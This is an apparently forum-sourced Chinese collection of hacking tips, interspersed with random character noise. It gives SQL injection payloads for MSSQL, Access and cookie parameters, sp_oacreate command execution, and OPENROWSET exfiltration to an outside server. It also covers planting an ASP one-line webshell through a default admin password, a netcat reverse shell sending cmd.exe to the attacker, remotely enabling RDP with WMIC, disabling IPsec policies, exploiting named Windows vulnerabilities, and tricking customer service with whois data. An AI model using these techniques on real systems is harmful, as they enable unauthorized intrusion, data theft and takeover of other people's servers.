SA点数据库分离技术相关
! t$ ]7 D% G+ ?/ e7 I' q
$ z( x7 i6 `2 }$ B7 |4 C/ b& X& }- D- r
SA点数据库分离搞法+语句:9 G0 L8 r1 E( z: n f! r
5 y, ?( n; Z7 `# M2 k* k1 ^. v1 `0 {
注射点不显错,执行下面三条语句页面都返回正常。
7 h1 h" | a- n( N: rand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
5 g1 A# D7 B5 }2 }and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
$ m6 ^4 }9 D3 y6 b: _ {8 `: E5 y) Jand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')+ n% T T4 Q& k
可以列目录,判断系统为2000,web与数据库分离4 W! Q" y: v6 k |- {9 a. u+ I9 R
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
7 Z" [# J/ s7 [# v0 h! c( E9 q$ @在注射点上执行
v3 k- l' K0 D" rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
) G2 U! g9 N# b5 D( v7 `页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP8 ~& {3 A& G$ W; g- W6 u
还有我用NC监听得其他端口都没有得到IP。# O6 a8 `* J$ r: _6 o- Y
! G( v& m5 [0 G
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
, G6 E# b7 o7 X2 U/ b* @'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--2 J6 i' f w; h! p( N
; W( r- v8 W( ^& e: d: X+ a7 G/ O
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
: M2 ?2 R$ e: i/ z# R# K
( s, D: g" m! B8 z现在就猜想是不是数据库是内网而且不能连外网。; h C* V. Z* ?' a' L
5 i2 [8 y- f$ G! N5 w* l) w; c2 A
@3 U ~8 u* ^% A$ B
access导出txt文本代码
1 g/ K% O8 c6 g2 lSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
& D& }. @2 i, S- k9 T/ N( L( f
; \* ~& A$ E/ a( J* Z1 V3 C" [1 Q& D+ O+ @* l6 z
' U) k7 L) D1 J0 W- x! R自动跳转到指定网站代码头. |+ H2 F- J; Z) J2 A# v" c/ @: h
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>2 f1 W6 B6 b8 _$ ]$ H, S4 N
0 G+ U+ g8 s/ N6 x8 U
% ?" o5 Q% _2 k. ?; o& _0 T
入侵java or jsp站点时默认配置文件路径:4 T4 J6 }; I( H1 r) F
\web-inf\web.xml! Q% \: \' @! y' R" A3 {' Y! `# b- a
tomcat下的配置文件位置:
" o0 e- A, z ?0 w/ Q. ?\conf\server.xml (前面加上tomcat路径)
) T2 z4 i# i+ L1 _. ^3 o\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
1 c8 V' o1 Y0 p5 I4 j; h
$ t1 r0 j2 F( y, K3 ?4 L x, I1 r( O' c% Q" d$ u
, Q) s. z5 b4 R: H' i
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:/ _4 J8 |2 o+ w
-1%23) K3 D7 x7 W! U: t# c$ O( M
> 6 ]# S: w; z. w+ l l9 `
<
0 p8 a2 [) a+ Q1'+or+'1'='1
* z) \6 x' h- L. T% f1 \id=8%bf
2 Y) Q7 g( s6 F9 x" U
6 e! ?! c# V3 v, L全新注入点检测试法:7 @8 `0 ^7 E7 }, U& v( M+ Q1 d
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。1 J) r$ O& {3 |1 z j
% J c% F* N: ^7 A; H6 K
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。' u* Q) F2 w: H4 }
4 Q" {7 | g+ }3 p4 R/ e' H8 ]
搜索型注入判断方法:
" f; v# Z+ e8 J' n* a北京%' and '1'='1' and '%'='( r% ^& ?6 V, n* P
北京%' and '1'='2' and '%'='" A; A2 ~3 d/ R. X4 O
0 |0 j. i% T9 ~+ w( ^0 Z% L i C6 D: K+ G6 w
COOKIES注入:
; |! M" M4 g" A) V7 p4 v4 N" s
javascript:alert(document.cookie="id="+escape("51 and 1=1"));/ i1 @' B; _+ [% R: x
/ K4 K% h" z6 k X9 o2000专业版查看本地登录用户命令:
: w; ^1 M0 x5 U0 n r9 nnet config workstation
/ [, Q& Z, g0 a" ]. i( x
- W, h6 f+ \6 A3 M8 h7 L3 y# C" N$ M
2003下查看ipsec配置和默认防火墙配置命令:
: L' B0 Q+ ^( Knetsh firewall show config3 U9 N; \. z2 o) Z: K$ }7 a( W
netsh ipsec static show all. I1 l9 @6 |% [: ~ P8 g
" r: c6 R) F0 }% h, B5 R
不指派指定策略命令:% \1 f4 G2 T7 _: x3 O/ K
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)
" P5 Z6 M4 G0 s& h# g& O* Lnetsh ipsec static show policy all 显示策略名
& ]' Q6 y# P# e8 O# ?/ q j7 G8 N ]" K, `1 j9 t
6 _# E( `$ C1 ^4 f+ E猜管理员后台小技巧:8 E: _+ F% k* Z8 m5 |
admin/left.asp K+ ~: d, h/ l% r9 j1 B* l
admin/main.asp3 {% O7 Z9 M7 t0 W1 A, p
admin/top.asp& x2 I* `2 F* A3 G* h* X
admin/admin.asp % X+ U. s( l# y" n) x. I6 T& ~& c
会现出菜单导航,然后迅雷下载全部链接+ F V f( W, z/ }
% U# Y9 f) j( ^3 Z7 L
+ y% m: M; d9 v' H" Q% y6 S6 X社会工程学:$ x6 Q0 S7 C: o3 G' c4 C# @
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
9 B1 k, y' o8 _% N9 F' k2 O然后去骗客服0 H$ `/ {: Q6 K- z x# i: i
2 D0 Q% H- L8 K1 Y9 F+ c4 \
& k1 F! c7 _: }$ Q9 Y
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
, _. h% z5 \4 L$ T9 @# A查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
( g8 i6 ?/ J7 Y! j6 w: ? 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。5 [1 v1 C. j3 t, R
, q& ~' s4 r+ d4 a; k) D6 ?9 d4 Y( M, ~ o4 |6 z
4 z6 b, x! P$ N! v) B
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)! r- c- x9 p" |+ ?9 R
8 |4 a2 k D, }* {% _4 U$ r0 H
' u0 Z* m% Q* j
4 V( O$ o# C& c" BCMD加密注册表位置
* m H. X6 z# V; R# P(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor% G' _$ v8 t9 |) q
AutoRun
& c" I, R; {; p! F4 u. _/ c- \$ K! S7 o( r+ V$ |3 k5 D
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
' A- Y. C# f8 j7 `! GAutoRun
) D# A/ q! P% E: k3 K! d9 _! X% Q8 f! ]1 u
0 z+ Y8 g6 P/ l* G! K
在找注入时搜索Hidden,把他改成test
( R- K- y' \( ^' t: i$ f0 t0 F) N; @8 k5 d' t4 R
; M/ v1 z# ~! f+ J! K8 }) T4 n! V3 Y8 H# g
mstsc /v:IP /console 9 b o. J& f8 J3 b
$ c, _( T8 _. n9 b" P$ m* M
+ u8 _7 c' x8 K! O8 l. U一句话开3389:# g0 N+ \+ U* {! {
5 [1 p3 ^; a+ o+ H+ ~) F* H- o
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
+ J7 H9 G$ m1 r3 U: t) @0 k9 L开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
( X8 I8 |) _4 \- a1 E! @/ P0 P; }( z2 s/ _
5 q5 x2 O* }$ E3 V
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
: W1 c9 G9 H* N$ |% MInsert into admin(user,pwd) values('test','test')1 E8 C! V8 i9 U1 R4 ^* q
" J# N R. a1 }5 l {) H- o7 U
4 O( X- z5 `3 ? H; E6 r: E
NC反弹
% O; A' s5 @2 I7 \/ `2 A先在本机执行: nc -vv -lp 监听的端口 (自己执行)
+ s5 z6 \. W* ^% w% @8 g6 m然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)7 }+ q! h: B8 ~, p: j
* H% K9 L# \/ [) J
) c, r9 A. c" `+ ~( O2 t% i1 Q; _在脚本入侵过程中要经常常试用%00来确认下参数是否有问题4 ?" L2 _2 ^( j( w, D$ t$ Z
. {, A! w# k& V5 @0 \
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录 \& H |2 e: l5 l% t) q5 d
例如:) _+ l7 J ^* a. F& D# L
subst k: d:\www\ 用d盘www目录替代k盘
; u$ t, L& U& ]8 Ssubst k: /d 解除K盘代替 |